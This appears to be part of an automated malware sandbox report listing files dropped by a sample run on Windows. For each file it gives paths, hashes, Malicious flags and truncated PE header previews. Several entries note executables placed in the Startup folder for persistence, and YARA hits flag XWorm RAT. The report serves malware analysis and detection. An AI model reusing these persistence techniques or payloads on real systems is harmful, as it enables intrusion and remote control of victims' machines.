                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpf0uuzm.ug5.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3198976
                                                                                                                                            Entropy (8bit):6.66194464256937
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:0RDfGY4MzqVDFDJKt+yEVlISupM+Gr9Jcx2gKG:sbGY4M8JDJy+yEVubM+GBJc8
                                                                                                                                            MD5:38560B590890A37AB8460092560D282C
                                                                                                                                            SHA1:2564DAC98B8ED26FCCAED9764F172C9123E50F2B
                                                                                                                                            SHA-256:014857E05F8C8ABACE4CCF74A6E613A755A651D724C510DC5959BEA75295F53B
                                                                                                                                            SHA-512:5A5B0869092B690AC373D03916142C454D88FCB7ABD26CEEBE738E2DF1D09416F19E0F73163050F1E45C3DABA980B1714193A79CAB84661277D11B455326F368
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................1.......1...@.................................W...k.............................0.............................l.0..................................................... . ............................@....rsrc...............................@....idata ............................@...mrenudwa. *.......*.................@...qxwztaye......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1181184
                                                                                                                                            Entropy (8bit):6.401110768123626
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
                                                                                                                                            MD5:BCC236A3921E1388596A42B05686FF5E
                                                                                                                                            SHA1:43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
                                                                                                                                            SHA-256:43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
                                                                                                                                            SHA-512:E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1181184
                                                                                                                                            Entropy (8bit):6.401110768123626
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
                                                                                                                                            MD5:BCC236A3921E1388596A42B05686FF5E
                                                                                                                                            SHA1:43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
                                                                                                                                            SHA-256:43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
                                                                                                                                            SHA-512:E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_isdecmp.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.745960477552938
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_setup64.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.215994423157539
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_shfoldr.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23312
                                                                                                                                            Entropy (8bit):4.596242908851566
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_isdecmp.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.745960477552938
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_setup64.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.215994423157539
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_shfoldr.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23312
                                                                                                                                            Entropy (8bit):4.596242908851566
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\pcqxl.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2625536
                                                                                                                                            Entropy (8bit):6.537979655585314
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5f0h+NftcnTMnrLafwGzMwGy95OkO42/h9C+hIXSlDFGI/MEEsdD/gVm:W+NfSYnAwGzfb5xO42ZailDREEEO
                                                                                                                                            MD5:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            SHA1:1FD284AF02569B01C46F81C67E419305B1CF4628
                                                                                                                                            SHA-256:F5A2F62F2BAC02EAB7FD22D868C5FA5AB61B517BFECC5C251817B6F9020E73C2
                                                                                                                                            SHA-512:6AD4C1819F11ACD02DC8A3CCBD19E516DCC92C5DD53A9C2ECA935E8615FF7024DB14E3072B786468343EFFBE66479C65C139555500B904FC0E337ABAFD791DFC
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....jg.........."......p....'.....@..........@.............................p(...........`.................................................p...<............0(..............`(.x...............................(.......8...............X............................text....o.......p.................. ..`.rdata...............t..............@..@.data...p.'......v'.................@....pdata.......0(.......(.............@..@.00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....reloc..x....`(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\is-4SN19.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1203559
                                                                                                                                            Entropy (8bit):6.37383440477572
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94o:yGUhni7iSFCQ9X
                                                                                                                                            MD5:FE0DF3346232B47B76BB20F85900D8C2
                                                                                                                                            SHA1:21CA0B32E39EAEE2F21698EF5912EF8E9418AED7
                                                                                                                                            SHA-256:B097953351A17692EA89A98F9114246A8685291020E3F40388754D5552ED19BB
                                                                                                                                            SHA-512:75DDBAF4BC249DFE7CAF0F2E2EA9275C43CB8FC5BBD97D293E396F31DB1395BA12DBC0F5E5792C20F1D10EE5378A4B4005B112F851AB870EC12FD50680FF9803
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\unins000.dat

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:InnoSetup Log Livid Pocket, version 0x418, 3427 bytes, 932923\37\user\376, C:\Users\user\AppData\Local\376\377\377\0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3427
                                                                                                                                            Entropy (8bit):3.773425184432956
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:RX688P1dblhcpvwvJu82tiKkCdfc1AGlEDA4MZAe2L7Hht:0PP1dphcpvcJu1iQf7fDSm7HL
                                                                                                                                            MD5:FFDA4986633EF3215A7C6F5DFC053648
                                                                                                                                            SHA1:4C6BCD108D77D2C1B29F339A9111C0A11F85D721
                                                                                                                                            SHA-256:F563A48E7850FD7E602459A4A51A76C1AFEBD04CCA53EC301003B0DDDEECA842
                                                                                                                                            SHA-512:4B5CC439AE1FB5AAE703A07043F841FA72DE610BD3D144699791EFBCE178682FEB40920CDA57D003685EE5EA29184310291019D5238CB3ED12F729F8F352F92D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Inno Setup Uninstall Log (b)....................................Livid Pocket....................................................................................................................Livid Pocket............................................................................................................................c...%................................................................................................................A.....h............s........9.3.2.9.2.3......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l................,...... ..............IFPS...............................................................................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.................!MAIN....-1..(...dll:shell32.dll.ShellExecuteW........................HASCMDLINEPARAM....26 @16..PARAMCOUNT.......COMPARETEXT.........PARAMSTR...........E.......INITIALIZESE

                                                                                                                                            C:\Users\user\AppData\Local\unins000.exe (copy)

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1203559
                                                                                                                                            Entropy (8bit):6.37383440477572
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94o:yGUhni7iSFCQ9X
                                                                                                                                            MD5:FE0DF3346232B47B76BB20F85900D8C2
                                                                                                                                            SHA1:21CA0B32E39EAEE2F21698EF5912EF8E9418AED7
                                                                                                                                            SHA-256:B097953351A17692EA89A98F9114246A8685291020E3F40388754D5552ED19BB
                                                                                                                                            SHA-512:75DDBAF4BC249DFE7CAF0F2E2EA9275C43CB8FC5BBD97D293E396F31DB1395BA12DBC0F5E5792C20F1D10EE5378A4B4005B112F851AB870EC12FD50680FF9803
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Roaming\9rpcss_1.drv (copy)

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1994010
                                                                                                                                            Entropy (8bit):7.240581605798372
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:kDfYXoYi50pMq0MI5F6E178BQh/GN8FzJ0y2f0IHii:kDfY4By7PILT178u/hzrJIHii
                                                                                                                                            MD5:48BFA0E8C3A2473A3D7E7C0B6238C22E
                                                                                                                                            SHA1:98F1E5793849E7FDE52024A45A5DB89E9B8CD811
                                                                                                                                            SHA-256:4988087CF45A09299DD128EEF754CF7DB3252313DD8D274CC5F5F327C3B34C20
                                                                                                                                            SHA-512:661D59F142D24FF096A254F52115872886514C6A5AB3B2CE2C1965AE197490F08D93D8D092B6F78A6BFFD54B59A9C8D48199C6CCAB9E7E9FEAF3DB097043D4AC
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...>Sr?.6..g.....&"...+.V...2...... ................................................N....`... ......................................@..q....P...................k..............l...............................(...................pW..0............................text....T.......V..................`..`.data........p.......Z..............@....rdata..0f.......h...f..............@..@.pdata...k.......l..................@..@.xdata..`....`.......:..............@..@.bss.........0...........................edata..q....@......................@..@.idata.......P... ..................@....CRT....`....p....... ..............@....tls................."..............@....reloc..l............$..............@..B........................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):560640
                                                                                                                                            Entropy (8bit):7.990855037191198
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:12288:9sVAAmc9HgyWZxASgVM9XM7Fn27bPJoUqN2NRJWizpAXEFjiOoE:9srmciyYV0MVsFgoUqNyRQyGXEti
                                                                                                                                            MD5:75C2C9D60104BA3C4271B2A629E90023
                                                                                                                                            SHA1:42F5E05283A1469F2F79400AAC3027231A937F2F
                                                                                                                                            SHA-256:34657C958EE4B7C1A99BD6A1A15CCCE2EC7046568428AA4A365AE4BC825A8363
                                                                                                                                            SHA-512:578AA899F7FFF7CE323DD6E3B1781AAB4FAA4A2292CF7F60DF370843448EDA1A998D0F09CCBEA0F52E83C5E9AAC7533206D42C976CB4A8732FEA9D614C9AD27B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...G.................0.................. ....@...... ....................................@...@......@............... ..................................p............................................................................................ ..H............text...@.... ...................... ..`.rsrc...p...........................@..@........................................H....... 9...!...........................................................*...(....*..(....*.Z @I.......%.....(....*..0..D.......8........E..../...8*...(......8....... ....o....8".......E........W...8....s......8|.....r...p(....o....8......r[..p(....o.... ....~]...{....9....& ....8........o......o....o...... ....~]...{....:q...& ....8f....s......8.....(....u....s......8..........s......8.........o....8........E....2...8-.....o....s...... ....~]...{x...:....& ....8............. ....~].

                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t}g................................. ........@.. ....................................@.................................X...S................................................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc...............Z..............@..B........................H........s..XX......$.....................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                            C:\Users\user\AppData\Roaming\NzL6O1Q.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
